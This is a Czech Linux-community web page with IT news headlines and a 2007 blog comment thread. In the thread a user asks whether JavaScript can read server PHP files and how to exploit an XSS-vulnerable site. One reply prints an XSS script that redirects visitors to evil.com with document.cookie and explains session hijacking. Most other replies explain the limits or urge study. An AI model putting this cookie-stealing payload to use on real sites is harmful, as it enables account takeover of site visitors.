.

Přihlášení | Registrace

napište » Zprávičky

inzerujte » Pracovní nabídky

Debian dnes slaví 32 let

dnes 01:00 | Komunita

Debian dnes slaví 32 let. Ian Murdock oznámil vydání "Debian Linux Release" 16. srpna 1993.

Ladislav Hagara | Komentářů: 0

Policie zadržela dárce bitcoinů ministerstvu spravedlnosti a zajistila i dar

včera 17:44 | IT novinky

Policisté zadrželi odsouzeného drogového dealera Tomáše Jiřikovského, který daroval ministerstvu spravedlnosti za tehdejšího ministra Pavla Blažka (ODS) bitcoiny v miliardové hodnotě, a zajistili i darovanou kryproměnu. Zadržení Jiřikovského může být podle ministerstva důležité k rozuzlení kauzy, která vypukla koncem května a vedla ke konci Blažka. Zajištění daru podle úřadu potvrzuje závěry dříve publikovaných právních

… více »

Ladislav Hagara | Komentářů: 5

Trumpova administrativa jedná o možném převzetí podílu v Intelu

včera 13:44 | IT novinky

Administrativa amerického prezidenta Donalda Trumpa jedná o možném převzetí podílu ve výrobci čipů Intel. Agentuře Bloomberg to řekly zdroje obeznámené se situací. Akcie Intelu v reakci na tuto zprávu výrazně posílily. Trump minulý týden označil Tana za konfliktní osobu, a to kvůli jeho vazbám na čínské společnosti, čímž vyvolal nejistotu ohledně dlouholetého úsilí Intelu o obrat v hospodaření. Po pondělní schůzce však prezident o šéfovi Intelu hovořil příznivě.

Ladislav Hagara | Komentářů: 3

Librem PQC Encryptor

včera 05:44 | IT novinky

Společnost Purism stojící za linuxovými telefony a počítači Librem má nově v nabídce postkvantový šifrátor Librem PQC Encryptor.

Ladislav Hagara | Komentářů: 9

VirtualBox 7.2

14.8. 18:00 | Nová verze

VirtualBox, tj. multiplatformní virtualizační software, byl vydán v nové verzi 7.2. Přehled novinek v Changelogu. Vypíchnou lze vylepšené GUI.

Ladislav Hagara | Komentářů: 0

Konečný vzhled hodinek Pebble Time 2

14.8. 14:11 | IT novinky

Eric Migicovsky, zakladatel společnosti Pebble, v lednu oznámil, že má v plánu spustit výrobu nových hodinek Pebble s již open source PebbleOS. V březnu spustil předprodej hodinek Pebble Time 2 (tenkrát ještě pod názvem Core Time 2) za 225 dolarů s dodáním v prosinci. Včera představil jejich konečný vzhled (YouTube).

Ladislav Hagara | Komentářů: 15

Nativní podpora ACME v NGINX

14.8. 12:44 | Zajímavý software

Byla oznámena nativní podpora protokolu ACME (Automated Certificate Management Environment) ve webovém serveru a reverzní proxy NGINX. Modul nginx-acme je zatím v preview verzi.

Ladislav Hagara | Komentářů: 1

KDE Gear 25.08

14.8. 12:22 | Nová verze

Vývojáři KDE oznámili vydání balíku aplikací KDE Gear 25.08. Přehled novinek i s náhledy a videi v oficiálním oznámení.

Ladislav Hagara | Komentářů: 0

Perplexity AI nabízí 34,5 miliardy dolarů za převzetí prohlížeče Chrome

13.8. 11:55 | IT novinky

Společnost Perplexity AI působící v oblasti umělé inteligence (AI) podala nevyžádanou nabídku na převzetí webového prohlížeče Chrome internetové firmy Google za 34,5 miliardy dolarů (zhruba 723 miliard Kč). Informovala o tom včera agentura Reuters. Upozornila, že výše nabídky výrazně převyšuje hodnotu firmy Perplexity. Společnost Google se podle ní k nabídce zatím nevyjádřila.

Ladislav Hagara | Komentářů: 5

Bezpečnostní chyby v produktech od Intelu – 08/2025. Mikrokód 20250812

13.8. 04:33 | Bezpečnostní upozornění

Intel vydal 34 upozornění na bezpečnostní chyby ve svých produktech. Současně vydal verzi 20250812 mikrokódů pro své procesory řešící 6 bezpečnostních chyb.

Ladislav Hagara | Komentářů: 0

Centrum | Napsat | Starší

navrhněte » Anketa

Kolik tabů máte standardně otevřeno ve web prohlížeči?

1-4 (52%)

5-15 (19%)

16-30 (4%)

31-50 (5%)

51-70 (3%)

71-100 (1%)

101-130 (1%)

>131 (17%)

Celkem 396 hlasů

Komentářů: 23, poslední 4.8. 13:01

Rozcestník

AbcLinuxu

HDmag.cz

unknown_ - blog

Aktuální zápisy

? Archív

? Současný desktop

Openbox 3.4.4, Onyx-citrus + FreeBSD 8-CURRENT

? Navigace

Nej blogů na AbcLinuxu

Nejčtenější za poslední měsíc

Nejkomentovanější za poslední měsíc

AbcLinuxu:/ Blogy / blog / asdgf / .

Štítky: není přiřazen žádný štítek

.

28.12.2007 01:18 | asdgf | poslední úprava: 26.11.2009 20:42

Hodnocení: 14 %

špatné • dobré

Tiskni Sdílej:

Komentáře

Nástroje: Začni sledovat (1) ? , Tisk

Vložit další komentář

28.12.2007 01:40 progdan | skóre: 34 | blog: Archař | Teplice/Brno
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Nejsem si zcela jisty, ale k souborum myslim JavaScript do urcite miry pristupovat dokaze. Cim sem si vsak jisty, nedokaze pristoupit k souboru php. Tedy dokaze, ale ziska pouze koncovy (X)HTML (nebo jiny) vystup, nikdy vsak samotny kod souboru - to nelze zadnym zpusobem ani jazykem (krome prolomeni hesla na FTP a stazeni souboru ale to uz je neco trochu jinyho)

Collecting data is only the first step toward wisdom, but sharing data is the first step toward the community.

28.12.2007 01:43 unknown_ | skóre: 30 | blog: blog
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Dík, myslel sem, že pokud k tomu dokáže přistoupit, tak jako k plain textu, protože html výstup už mám :-)

28.12.2007 01:45 unknown_ | skóre: 30 | blog: blog
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

K tomu přístupu k .php, mělo by to jít pomocí php funkce readfile()?

28.12.2007 01:54 Josef Kufner | skóre: 70
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

K souborům by jsi se neměl dostat ani na straně klienta a už vůbec ne na straně serveru. Pokud se ti to povede, tak to nahlaš jako obrovskou bezpečnostní díru.

Hello world ! Segmentation fault (core dumped)

28.12.2007 01:59 unknown_ | skóre: 30 | blog: blog
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

To se mi nepovede už proto, že se tím asi dál zabývat nebudu, jen sem se trochu nudil, takže je mi to docela jedno. Jenom škoda, mohl z toho být poprask. Ale na to XSS je náchylnej snad každej druhej server :-/

28.12.2007 01:59 Přemek Vyhnal | skóre: 24 | blog: Toto není blog! | Dobřichovice
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Můžu pomocí javascriptu zobrazit index.php?

Javascript běží u klienta - v prohlížeči.

Ale kdyz ho dokazes vlozit do nejaky stranky tak aby se zobrazil i jinym navstevnikum tak muzes napriklad ukrast prihlasovaci susenku.

<script>
location.href="http://evil.com/sendtomail.php?cookie="+document.cookie; 
</script>

Tohle presmeruje navstevnika na utocnikuv server na script kterej parametry co dostane pres GET posle na mail (treba). Utocnik si pak to co mu prijde nastavi jako svoji susenku a rychle nez se obet odhlasi se pujde s tou susenkou podivat na ten web a bude prihlasenej jako uzivatel kterymu to ukrad.

..ale je to lamarna .)

BTW jde to i na abclinuxu

NO RAPTORS!

28.12.2007 10:37 Ritchie | skóre: 27 | blog: Ritchie's | Berlin
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Samozřejmě, že lze pomocí javascriptu otevřít soubor, stačí vytvořit objekt File. Ovšem ne všechny implementace javascriptu povolují vytvořit takový objekt, například implementace javascriptu v prohlížečích z pochopitelných důvodů soubory otevírat neumožňují.

Nemusím snad psát, že abyste mohl otevřít soubor, musíte mít přístup k souborovému systému, kde se soubor nachází. Pokud máte představu, že HTTP zpřístupňuje souborový systém serveru, doporučuji si přečíst alespoň úvod k tomuto protokolu. Zabralo by vám to jistě méně času, než napsání nesmyslného příspěvku do blogu.

28.12.2007 11:51 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Btw neznáte nějaký přehled javascriptových funkcí? Nerad bych swe zdržoval věcma jako že a=1, b=2, a+b=3; to je ve všech jazycích stejný. Potřeboval bych nějaký přehled všech funkcí javascriptu. Nevíte o něčem takovým? … Co udělat na webu, hacknutelného přes XSS, když nemůžu nahradit index?

Nechat ten hacknutelný web na pokoji, a jít studovat základy. Základy programování, základy HTML a souvisejících věcí, co je to JavaScript a co jsou různé jeho implementace. Pak taky můžete trénovat vyhledávání Googlem (to abyste se nemusel shánět po manuálech k JavaScriptu, když vám jich Google najde několik stránek). Až to všechno budete mít nastudované, zjistěte si taky, co je to XSS – doufám, že po prostudování všeho předešlého už nebudete zklamaný z toho, že XSS není to, co hledáte.

28.12.2007 22:34 Mazarik
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Pokial Javascript chcete pouzit ako jazyk na serveri(nieco v style php), tak sa samozrejme subory otvarat daju. Pokial chcete pracovat so subormi na html stranke na strane klienta, tak to ide imho maximalne pomocou html input type="file" tusim, kde sa Vam otvori file dialog. Na ine operacie so subormi na strane klienta potrebujete vacsie prava, ktore musi povolit uzivatel. Aj ked som presne nepochopil o co Vam vlastne ide, tak pravdepodobne chcete presmerovat stranku pomocou javascriptu na inu stranku. Tak to sa robi napriklad document.location.href="_adresa_"

28.12.2007 22:36 Mazarik
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Este celkom dobra a dokumentacia Javascriptu, ktora funguje vo vsetkych prehliadacoch, je na stranke http://devguru.com/technologies/javascript/home.asp

Založit nové vlákno • Nahoru

Píšeme jinde

ISSN 1214-1267 www.czech-server.cz

Redakce | Inzerce | Podmínky použití | Osobní údaje